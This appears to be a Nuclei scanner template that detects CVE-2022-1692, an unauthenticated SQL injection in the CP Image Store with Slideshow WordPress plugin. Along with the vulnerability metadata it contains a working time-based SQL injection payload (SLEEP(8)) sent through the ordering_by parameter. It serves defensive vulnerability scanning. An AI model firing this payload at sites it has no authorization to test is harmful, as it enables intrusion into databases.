id: CVE-2022-1692 info: name: CP Image Store with Slideshow <= 1.0.67 - SQL Injection author: Shivam Kamboj severity: critical description: | The CP Image Store with Slideshow WordPress plugin before 1.0.68 does not sanitise and escape the ordering_by query parameter before using it in a SQL statement in pages where the [codepeople-image-store] is embed, allowing unauthenticated users to perform an SQL injection attack. impact: | Unauthenticated attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise. remediation: | Update to version 1.0.68 or later. reference: - https://wpscan.com/vulnerability/83bae80c-f583-4d89-8282-e6384bbc7571/ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cp-image-store/cp-image-store-with-slideshow-1067-unauthenticated-sql-injection - https://nvd.nist.gov/vuln/detail/CVE-2022-1692 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1692 epss-score: 0.1036 epss-percentile: 0.95229 cwe-id: CWE-89 metadata: verified: true max-request: 2 tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,cp-image-store,unauth flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/?s=codepeople-image-store&post_type=page&feed=rss2" matchers: - type: word words: - '' internal: true extractors: - type: regex name: path regex: - 'https?://[^/]+(/[a-zA-Z0-9][^<]*)' group: 1 internal: true - method: GET path: - "{{RootURL}}{{path}}?ordering_by=post_title%20DESC%2C(SELECT%209143%20FROM%20(SELECT(SLEEP(8)))cFAm)--%20" redirects: true max-redirects: 3 matchers: - type: dsl dsl: - 'duration >= 8' - 'contains(body, "cpis_image=")' - 'status_code == 200' condition: and # digest: 4a0a00473045022100aa24eb554fc6f6fb04e897bbd9dab514ff77f79a53f7a1521aac47b631252e6c022015c7f68d168ceec46e005c565bd88f3aafee917a091939af2eb2a48bc6de4b1e:922c64590222798bb761d5b6d8e72950